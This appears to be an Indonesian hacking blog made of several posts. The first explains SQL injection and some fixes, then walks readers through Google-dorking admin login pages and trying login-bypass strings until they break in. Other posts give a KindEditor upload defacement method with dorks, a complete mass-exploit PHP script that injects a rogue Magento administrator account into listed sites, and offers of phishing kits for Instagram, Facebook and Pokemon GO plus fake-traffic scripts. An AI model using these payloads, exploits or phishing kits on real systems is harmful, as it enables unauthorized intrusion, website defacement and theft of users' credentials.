Tutorial Pengertian,Terjadinya,Dan Mengatasi SQL Injection

Halo semua,, kali ini saya menshare sesuatu yang berbeda yaitu "Penyebab dan Akibat Terjadinya SQL Injection" biar lebih variasi aja sih, kalo bikin tutorial deface kan saya juga harus punya target dlu, sedangkan nyari target itu ga gampang -_-. Ok simak aja materinya nya :)

Pengertian SQL Injection

1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection

1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Apakah Bug SQL Injection berbahaya ?

1. Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2. Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3. Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
4. saat si hacker berhasil upload shell kedalam web, si hacker akan bisa melakukan apa saja dengan fasilitas yg dimiliki shellnya dan otak nya wkwkwk

Apa saja yang diperlukan untuk melakukan SQL Injection ?

1. Internet Exploler / Browser
2. PC yang terhubung internet
3. Program atau software seperti softice
4. And Your Brain :)

Contoh sintaks SQL Injection :

Contoh Syntax SQL dalam PHP

1. $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2. isikan password dengan string ’ or ’’ = ’
3. hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4. maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Contoh Syntax lain :

1. Sintaks SQL string ‘-- setelah nama username
2. Query database
3. SQL Injection melalui URL

Penanganan SQL Injection :

1. Merubah script php
2. Menggunakan MySQL_escape_string
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php

Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string

Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :

3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :


Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection

1. Masuk ke google atau browse yg lain
2. Masukkan salah satu keyword berikut :
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}


3. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name dan password).
4. Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
5. Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6. Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7. Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x

Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION :

1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.


Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil. Tetapi jangan jadikan Seni Hacking sebagai kejahatan karna pada dasarnya Hacking itu bukan kejahatan, tergantung bagaimana kita membawa/menggunakannya.

Thanks to Garuda Security Hacker And TKJ Cyber

No Army Can Stop Our Idea

Tutorial Deface Method Kindeditor Terbaru Dan Lengkap

1. Masukan Dork Berikut ke kotak pencarian Google :

                                                                       inurl:examples/uploadbutton.html

                                                                        inurl:kindeditor

2. Pilih salah satu website yang ingin kalian Deface

3. Tambahkan exploit : 

Exploitnya : /Kindeditor/examples/uploadbutton.html
             http://site.com/exploit

             site.com/Kindeditor/examples/uploadbutton.html

4. Setelah anda memilih website yang akan diDeface,maka akan keluar tampilan seperti ini :

4. Klik upload >> pilih Script deface agan dengan format (.html)

5. tunggu sampai keluar URL hasil upload-an HTML kita

6. Copas link tersebut dan letakkan diakhir URL

Contoh : site.com/link yang terdapat di kolom upload

7. Tara, Anda sudah berhasil Mendeface Dengan Method Kineditor ^_^ 

NB : Hasil Saya : http://www.designcss.org/public/jfk/source/kindeditor-4.0.5/attached/file/20170401/20170401204606_82135.html

Gretz to : Hydra - PH4NT3R - Ri3Z - Lyonc - Mr Spongebob - All Member Garuda Security Hacker And Indonesia Coder Galau Team :l

Keep learning and silent , Regardz Hydra ./KiNekaru

     

Script Phising Instagram Followers V2 | NOT True Login |

#PHISING-INSTAGRAM-MasterOgar-V2

NOT True Login
Send Mail 

Link Download : COEEEEEEEGGGGGGG

[ WTS ] Script Facebook Auto Komen VIP Terbaru

Tidak mau ngeluarin modal maunya untung terus " Orang Tolo Abad InI"

Mau Ngeluarin Modal Biar Untung Terus ", Orang Pintar Abad InI"

Password : 15K Pulsa Telkomsel Kawan

Pembayaran Lewat Pulsa , Silahkan Kontak Facebook Saya :

• FACEBOOK
• DOWNLOAD

NB : Script Auto Komen Facebook Yang Saga Jual InI Fiturnya Auto Detect Nama , Kata Kata Sendiri , Responsive

Script Instagram Photo Downloader Terbaru

Hydra Back Kawan ,, Sebelumnya saya sering membagikan Script, aplikasi hacking, hingga tutorial. Tapi kali ini saya akan membagikan sesuatu yang berbeda, yaitu Script Instagram Photo Downloader yang bisa kamu download gratis di blog ini.

Apa saja fiturnya?

• Tampilan elegan, simple but ciamik.
• Loading Cepat
• Otomatis mengambil Media ID
• Otomatis mengambil user ID
• Terdapat frame khusus berisi data tentang post, seperti username, jumlah like dan koment
• *support hosting gratisan.

Namun script ini juga punya kekurangan yaitu kurang responsive jika dibuka dengan perangkat Mobile dan satu lagi tidak bisa download video, kenapa? Namanya juga  Script Instagram Photo Downloader, untuk Instagram Video Downloader akan saya bagikan dipost selanjutnya 

Untuk penampakannya bisa dilihat disini : 

With Script Instagram Photo Downloader You Can Build Awesome Website to Download Instagram Photos For Easly.

• FACEBOOK
• DOWNLOAD

Auto Tags : Free Donload Script Instagram Photo Downloader, Script Phising, Script Instagram, Script Terbaru, Script True Login

Terima Kasih , anda baru saja membaca artikel diblog kami dengan judul " Script Instagram Photos Downloader"

Script Phising Pokemon GO Hack Terbaru [ Polosan ]

- Hallo sahabat setia KINEKARU terimakasih telah mampir ke blog yang sangat sederhana ini,kali ini saya akan merangkum sedikit ulasan artikel SCRIPT POKEMON GO Hack V5, dan sebelumnya, saya berharap dengan adanya postingan kali ini bisa menambah wawasan dan informasi anda sebagai pencari informasi. dan semoga postingan kali ini bisa membawa manfaat baik untuk saya selaku penulis maupun untuk anda sebagai pengunjung,

Review : 

• ADMIN
• DOWNLOAD

Pokemon Go Hack V5 Script

Perlu diingat Sahabat KiNekaru, untuk artikel kali ini saya hanya memberikan Sebuah POLOSAN script saja, dan anda bisa mengembangkannya dan dijual ulang, karena OPEN SOURCE hehehe

Sebelum saya menutup betul artikel ini, saya ingin mengucapkan banyak terimakasih kepada anda semua yang telah membaca artikel Script Phising Pokemon Go Hack V5 Semoga artikel ini bisa bermanfaat.

Script Magento Add Admin Account Mass Exploit

<?php
error_reporting(0);
#----------------------------------------------------#
#   Magento Add Administrator Account Mass Exploit   #
#               Codec By Synchronizer                #
#                Stupidc0de Family                   #
#          http://facebook.com/iniannam              #
#          http://dwnsource.blogspot.com/            #
#----------------------------------------------------#

#Exploitasi magento website dengan mengirimkan SQL Injection lewat post data
$get=file_get_contents($argv[1]) 
or die("
\n\tError !
\n\tusage => php thisscriptname.php yourlist.txt\n\n");
$j=explode("\r\n",$get);
foreach($j as $url){

print "\n\n\t[+] Exploiting => ".$url;
$dirnya = "/admin/Cms_Wysiwyg/directive/index/";

$postdata = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';

$ch = curl_init(); 
curl_setopt ($ch, CURLOPT_URL, $url.$dirnya); 
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); 
curl_setopt ($ch, CURLOPT_TIMEOUT, 60); 
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata); 
curl_setopt ($ch, CURLOPT_POST, 1); 
$headers  = array();
$headers[] = 'Accept-Encoding: gzip, deflate';
$headers[] = 'Content-Type: application/x-www-form-urlencoded';

curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt ($ch, CURLOPT_HEADER, 1);
$result = curl_exec ($ch);
curl_close($ch);
 
#Exploitasi berhasil dan memulai cek Login setelah exploitasi
if(preg_match('#200 OK#', $result)) {
print "\n\t[+] Exploiting Success, mulai mengecek login..";
$loginpage = $url."/admin";
$logindata = 'form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77';

$hydra_ch = curl_init(); 
curl_setopt ($hydra_ch, CURLOPT_URL, $loginpage); 
curl_setopt ($hydra_ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); 
curl_setopt ($hydra_ch, CURLOPT_TIMEOUT, 60); 
curl_setopt ($hydra_ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt ($hydra_ch, CURLOPT_POSTFIELDS, $logindata); 
curl_setopt ($hydra_ch, CURLOPT_POST, 1); 

$headers  = array();
$headers[] = 'Accept-Encoding: gzip, deflate';
$headers[] = 'Content-Type: application/x-www-form-urlencoded';

curl_setopt ($hydra_ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt ($hydra_ch, CURLOPT_HEADER, 1);
$hasil = curl_exec ($hydra_ch);
curl_close($hydra_ch); 

if(preg_match('#302 Moved#', $hasil)) {
#Exploitasi berhasil dan admin user baru benar benar masuk ke database.
print "\n\t[+] Login Success ! \n\t[+] user => hydra  \n\t[+] password => hydra77";
print "\n\t[-] Login Page => ".$loginpage."\n";
}
else {
#Exploitasi berhasil dan namun admin user tidak masuk ke database.
print "\n\t[-] Login Failed :( ";
print "\n\t[-] Keterangan : admin user tidak masuk ke database.\n";}
}else {

#Exploitasi gagal total 
print "\n\t[-] Exploitasi Failed :(\n ";}
}

?>

Copas semua Script diatas lalu pastekan di LocalHost/Cpanel/Web Lalu Exploit .

Sekian saja salam dari hydra ,Kinekaru

Script Phising Facebook Get Iphone Terbaru

SCRIPT PHISING FACEBOOK IPHONE VERSION

Thanks To : KiNekaru - Hydra - R13Z - PH4NTHER 

Hydra Males Nulis Artikel, Jadi Simple Sadja Mhanx :v

KiNekaru Present :

• Facebook
• Download

Key Info = hydra

Script Auto Visitor Random Visitor Terbaru

Meningkatkan Traffic Blog Dengan Auto Visitor Terbaru 2016

Meningkatkan Traffic Blog Dengan Auto Visitor Terbaru 2017 -

Hallo sahabat KiNekaru Pada artikel Script Auto Visitor Sederhana kali ini yang berjudul Script Auto Visitor Blogspot Random Proxy Dengan Auto Visitor Terbaru 2017. saya telah meringkas sedemikian rupa artikel ini sehingga pembaca dapat mudah memahaminya. Mudah-mudahan isi postingan ADMIN Hydra  yang saya tulis ini dapat anda pahami. Okelah, ini dia artikelnya.

DOWNLOAD SCRIPT DISINI

Password : Disini

Template Seocips Premium Responsive

Template Seocips Premium By Hydra

Jual Template SeoCips Premium Remake

Selamat sore kawan, pertemuan kali ini hydra akan mengenalkan anda template SeoCips Premium Seo Friendly , Template yang sangat seo dan dicari blogger.

Harga : Rp 40.000 [ Nego Tipis ]

Metode pembayaran : Telkomsel 

Jika anda ingin sukses jadi Modalilah Sedikit √

• Facebook
• DEMO

NB : Jika anda minat bisa hubungi Facebook saya ,
Sekian dan Terima Kasih ^_^